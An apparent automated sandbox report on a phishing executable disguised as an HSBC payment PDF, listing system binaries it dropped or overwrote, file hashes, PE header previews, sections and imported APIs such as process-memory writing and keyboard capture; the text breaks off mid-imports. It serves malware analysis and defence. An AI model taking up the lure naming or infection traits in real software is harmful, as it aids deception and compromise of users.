Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1381376
Entropy (8bit):	4.682153153016039
Encrypted:	false
SSDEEP:	24576:cnS/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:cnSLNiXicJFFRGNzj3
MD5:	37501D1309CA59B3AC5B8B5DFADCDFD8
SHA1:	7A65CEDFB82CF5B88938AE1E5B6C5A12674099E5
SHA-256:	A6A23D765362449222C4A749FB531B3C10F4C1CAF053F15090CED1AF440A00A7
SHA-512:	82B4430B2E4DBA707B935FD42D5CA1C6ED8D098090AB9AF8E1B9A5A442B98178312A20046DBD84DD95FB75497E0410AFBEA353CD8FD741FEB5EED369682EE981
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,..dB.dB.dB....dB..A.dB..F.dB.dC.,dB..C.dB..G.dB..J.dB....dB..@.dB.Rich.dB.........PE..d...E.~..........."............................@.............................. ........... .......... ......................................`E...............p.. ................... ...T...............................................8...TA.......................text............................... ..`.rdata..rV.......X..................@..@.data........`.......@..............@....pdata.. ....p.......D..............@..@.didat...............R..............@....rsrc............ ...T..............@..@.reloc...`...........t..............@...................................................................................................................................................................................................................................

C:\Windows\System32\msdtc.exe

Download File

Process:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	modified
Size (bytes):	1434112
Entropy (8bit):	4.680805347644788
Encrypted:	false
SSDEEP:	24576:2IyZ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:2IOLNiXicJFFRGNzj3
MD5:	66EF836C2063921FB3CB22B8933CE32B
SHA1:	173121B58E0A1B14077EB489A0B12703B32C65AA
SHA-256:	55148FCFD791C6925B958D3B3604F989363D1DAD28A297CFAD7D06E52111A394
SHA-512:	CCFDB124F991715CA425FFAC6D969D4B98ECE4CCB6FECC6534FDF2E8D444E485938C1592A3CE83DB8CB60A025521DF9A0A4A6A546EBC0C62E44DEAEF7F8C8F61
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Voq.Voq.Voq.B.r.Uoq.B.u.Coq._..}oq.B.p.^oq.Vop..oq.B.y.Noq.B.t.Roq.B...Woq.B.s.Woq.RichVoq.........................PE..d......D.........."......h..........0i.........@..............................!.....T..... ..........@.............................................. ..xx......p...................`...T...........................@...............X...........@....................text....g.......h.................. ..`.rdata..pO.......P...l..............@..@.data....)..........................@....pdata..p...........................@..@.didat.. ...........................@....rsrc...xx... ...z..................@..@.reloc...`...........B..............@...................................................................................................................................................................................................................

C:\Windows\System32\msiexec.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1355264
Entropy (8bit):	4.598896272389679
Encrypted:	false
SSDEEP:	12288:z4KtiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:/x/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	358EDA756CDBC52D359B47AABD11CFF1
SHA1:	69C9563D5FBAD40EBDEEB99894D254728DF1E4C9
SHA-256:	BF9D57EFCB1D520ACEF11C03A82C9F82AC75DECF6A05702B4EE4537C647CB4FD
SHA-512:	C67CA77BB3DA740282A711E01C99A38D3F7CAE039959FF3294B68B6F61A4EADBFC4A49A8C6C981C01BF5FA041490A8D8F08FCE496867A1347BB853D44BFBC371
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................8..............................Rich............PE..d................"...........................@.....................................s.... .......... ......................................8........@....... ..........................T.............................................. .......@....................text...!........................... ..`.rdata..:7.......8..................@..@.data....$..........................@....pdata....... ......................@..@.didat.......0......................@....rsrc........@... ..................@..@.reloc...`...`......................@...........................................................................................................................................................................................................................................

C:\Windows\System32\snmptrap.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	4.52704651419998
Encrypted:	false
SSDEEP:	12288:SyJiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:bV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	7DBF214BD93545C4D17CEB2B153C47D3
SHA1:	8CB75DA0A0E6ADAA473BC881512CAE2613706DF0
SHA-256:	03874BD05E52C320EFBE464BC7CE58B1F0FA5963E4531444709DB2DBE4FA53FA
SHA-512:	F1564994269BE986855FEDBE8AB661AA67655AF5CE0AF4AA6FFDCB0994B58DF086F98AD90C7F399FD13F1D15AA5CFAC4765E268975D32FF5BCF32553CF832AA7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........^m.^?..^?..^?..JT.._?..JT..\?..JT..M?..JT..W?..^?...?..JT..\?..JT.._?..JT.._?..Rich^?..................PE..d....Ou..........."...... ...&......`'.........@....................................JO.... .......... ......................................l8..d....`.......P..,...................p4..T............................0..............(1..X............................text... ........ .................. ..`.rdata.......0.......$..............@..@.data........@.......4..............@....pdata..,....P.......6..............@..@.rsrc........`.......8..............@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................

C:\Windows\System32\vds.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1303552
Entropy (8bit):	7.160766810883738
Encrypted:	false
SSDEEP:	24576:rZ0FxT1UoYr99GdcJKk/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NwWskLNiXicJFFRGNzj3
MD5:	B57D375F949CD736B41299F19E73A57A
SHA1:	69B44EE95F70704CFC400ADA31C4AD23BC80DBAA
SHA-256:	EBE8FE2C0F294B2338A9453BDEA0D9C94D393A8B11C0B5E3F215FF64262C33E8
SHA-512:	3ACE44F61649BF2BECC16202EFE0BC80EDA016A22594CBD4296676FC5A6421639C3DE72C291A875788F3DFE212EE20771CD7528070E47D1826A7C94E7EF6B519
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........0..c..c..c..uc...c...b..c...b..c...b..c...b..c..cR..c...b...c...b..c...c..c...b..cRich..c................PE..d................."..........6......@..........@.............................@.......(.... .......... ..................................8#......H....@...........,...................s..T...........................` ..............x!.......{.......................text............................... ..`.rdata..............................@..@.data...............................@....pdata...,..........................@..@.didat.......0......................@....rsrc........@......................@..@.reloc.......P......................@...................................................................................................................................................................................................................

C:\Windows\System32\wbem\WmiApSrv.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1495040
Entropy (8bit):	4.819232239200769
Encrypted:	false
SSDEEP:	24576:IyocDApf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:locDApfLNiXicJFFRGNzj3
MD5:	EBF59C0B945DC1A3007361B448C7765A
SHA1:	916994D4D21413BDCFFB1ACDF33A69246697EEB9
SHA-256:	E0F7F748BC9C53A68CDA7D7909026B951A370A24F8BBD5B5F87362BDF57C8AF5
SHA-512:	634089FD54FF90D6C8A1CDD129C48604C4A088604B659A792B456E387C927ADA6C629DA196AAFD85E8B03B24B8C5BA611AB68ED90FC07466F3C8B7188376369D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........N]...]...]...T...k...I..^...I..J...]...T...I..Z...I..W...I..h...I..\...I.n.\...I..\...Rich]...........................PE..d...&Gf..........."..........Z......0..........@..............................!........... .......... ..............................0....%......0....`.. ....0.......................B..T...................h...(...P.......................$........................text...?........................... ..`.rdata..............................@..@.data...............................@....pdata.......0... ..................@..@.didat..(....P.......$..............@....rsrc... ....`.......&..............@..@.reloc...`...p.......0..............@...........................................................................................................................................................................................................

C:\Windows\System32\wbengine.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2164736
Entropy (8bit):	7.056811995989096
Encrypted:	false
SSDEEP:	49152:iWcnPqQUGpuphwC0DNLDpaRFXrLuWGMK8IK7LNiXicJFFRGNzj3:U0zuNIx7wRGpj3
MD5:	2FF68734C11FD98E322F8F7E5C9471FF
SHA1:	E33A5EF7B5245A58B3F19F6BEE0C5D1F1CB0660E
SHA-256:	8EC17D9722B97B0320ABBF83344E507121B97FF2705B44F5EFF1C76935B9E894
SHA-512:	71F955F2338F048475BACC7B7DA004B6CECFA931F6321EEC7832A071478E8273EADF619C18380C935DDAC7CEB1C2365DB527C9735458E196EBF77DAF502A4D74
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............M...M...M..L...M..L...M..L...M..L...M...My..M..L4..M..L...M..pM...M..L...MRich...M........PE..d....c..........."..........`...... ..........@.............................`!......Z!... .......... ...............................z......h...\|....`...........w..................p...T...................x...(...`................................................text............................... ..`.rdata..............................@..@.data....%..........................@....pdata...w.......x..................@..@.rsrc........`......................@..@.reloc.......p.......(..............@...........................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDevice.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10005674595479212
Encrypted:	false
SSDEEP:	6:QcGI63l/k/uMclF6vMclFq5zr2NOn+SkUeYDwDzymdIjj:nH6V/kqF69Fq5zrCO+pawHym2f
MD5:	A2626F0AD1243BBF12B963F16369A3BB
SHA1:	C0D2A0EBD93DDA9B87EEF0663D4A67E704EE63DA
SHA-256:	945B07C94CECF5DA2516CAD72D4376C7BEDCA748A5D65275AE7639DDDA3701DD
SHA-512:	AF1D5A175A01497E7A4B6F4166806150C42263708F1417355B701EA1D829BC8E02FCBECA2D1F3D942BFB9C38BC018E758E887044DA906C9E8A6F69564F8C5C56
Malicious:	false
Preview:	....`...`.......................................`...!...................................f<.V....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`...............mM..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e...e.t.l...........P.P.........f<.V....................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicDeviceHeT.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10150379425264784
Encrypted:	false
SSDEEP:	6:Dnq/ls63l/k/uMclF6vMclFq5zrZ+HNMu3n+SkUeYDwDzyM3q/lsjb:Dq/66V/kqF69Fq5zrCX+pawHyX/6X
MD5:	4601F4DCEC8F201D824F6F2E5D4EE78B
SHA1:	52930D41D78C29CB498D2EEE3B25D83C83B67EA3
SHA-256:	FB14875B5494EA49BA1F585DE8C1AA756FF72E1F797413C2AB2967DB9B096DDA
SHA-512:	B30AF9696278D08F29DF550E1A03BD9CA6649CAD66305C85AA8DA9950C1A30FDCED2BB472FAA6EC3FB29856B39FF7F3B40A315AF54B315DA76BE4BF3145075A8
Malicious:	false
Preview:	....h...h.......................................h...!...................................b..V....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`............b..mM..........H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.D.e.v.i.c.e.H.e.T...e.t.l.......P.P.........b..V............................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\DiagOutputDir\HolographicShell.etl

Download File

Process:	C:\Windows\System32\Spectrum.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.09897805159451005
Encrypted:	false
SSDEEP:	6:ucd63Nk/uMclF6vMclFq5zrPHNIn+SkUeYDwDzyIjr:uE69kqF69Fq5zrVI+pawHyIn
MD5:	26A5FFD987301FCCDD0CE482623400C0
SHA1:	BBF7AC0AFDCB38E303159AB4043E59762D377D03
SHA-256:	FBB8472CE32D1463356939AB0D7CFF4DE356E1711D9CB76155FF83C0784EF805
SHA-512:	4FB0C221678ED18AB0CA641DC48DD23D7548F60E35EF8C024EA838A82FBF6E3739FE8F4C8D82C5A0D75350ED95A5155BDA81BB5CF5ADB1034CBD1615CAA308AF
Malicious:	false
Preview:	....X...X.......................................X...!......................................V....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................@...`............z..mM..........H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P............V............................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.396783484531328
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File size:	1'561'088 bytes
MD5:	81b5afa3c4b482b020699087cbadf902
SHA1:	65952a38e840d96662972cc99c71e8b901ade1b5
SHA256:	3a4bf749beed4f07deb352b6e0faf28c5c2f28d62374a8bbb3eeeb67b1096851
SHA512:	53fb54d31f493990d04b42de63b7fc5a0035958e86f7846e051c809de28bd2e8bfa9dd28049fad08ace8afe4b724798f1b8e3c055098bbb1adab337f037d7a69
SSDEEP:	24576:hu6J30O0c+JY5UZ+XC0kGso6FaOGMlUWYa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz5:z50c++OCvkGs9FaOrYaLNiXicJFFRGNM
TLSH:	0575DF2273DDC360CB769173BF29B7016EBB3C654630B8572F881D7DA960262162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x675C1D87 [Fri Dec 13 11:41:59 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FB160DD2D0Ah
jmp 00007FB160DC5AD4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB160DC5C5Ah
cmp edi, eax
jc 00007FB160DC5FBEh
bt dword ptr [004C31FCh], 01h
jnc 00007FB160DC5C59h
rep movsb
jmp 00007FB160DC5F6Ch
cmp ecx, 00000080h
jc 00007FB160DC5E24h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FB160DC5C60h
bt dword ptr [004BE324h], 01h
jc 00007FB160DC6130h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FB160DC5DFDh
test edi, 00000003h
jne 00007FB160DC5E0Eh
test esi, 00000003h
jne 00007FB160DC5DEDh
bt edi, 02h
jnc 00007FB160DC5C5Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FB160DC5C63h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FB160DC5CB5h
bt esi, 03h
jnc 00007FB160DC5D08h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x26a18	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	dca3bc6445388a9f1e3714c44bba7a1c	False	0.5728679102422908	data	6.676125980325468	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x26a18	0x26c00	4f40d76a044d6705bd05847a9cb47670	False	0.8285282258064516	data	7.628720634017714	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xee000	0x96000	0x95000	01f4569f3802ef46759af3a6a3c86e4b	False	0.9705425492869127	data	7.920470153924606	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x1dcdd	data			1.0003768113567666
RT_GROUP_ICON	0xed498	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xed510	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xed524	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xed538	0x14	data	English	Great Britain	1.25
RT_VERSION	0xed54c	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xed628	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, 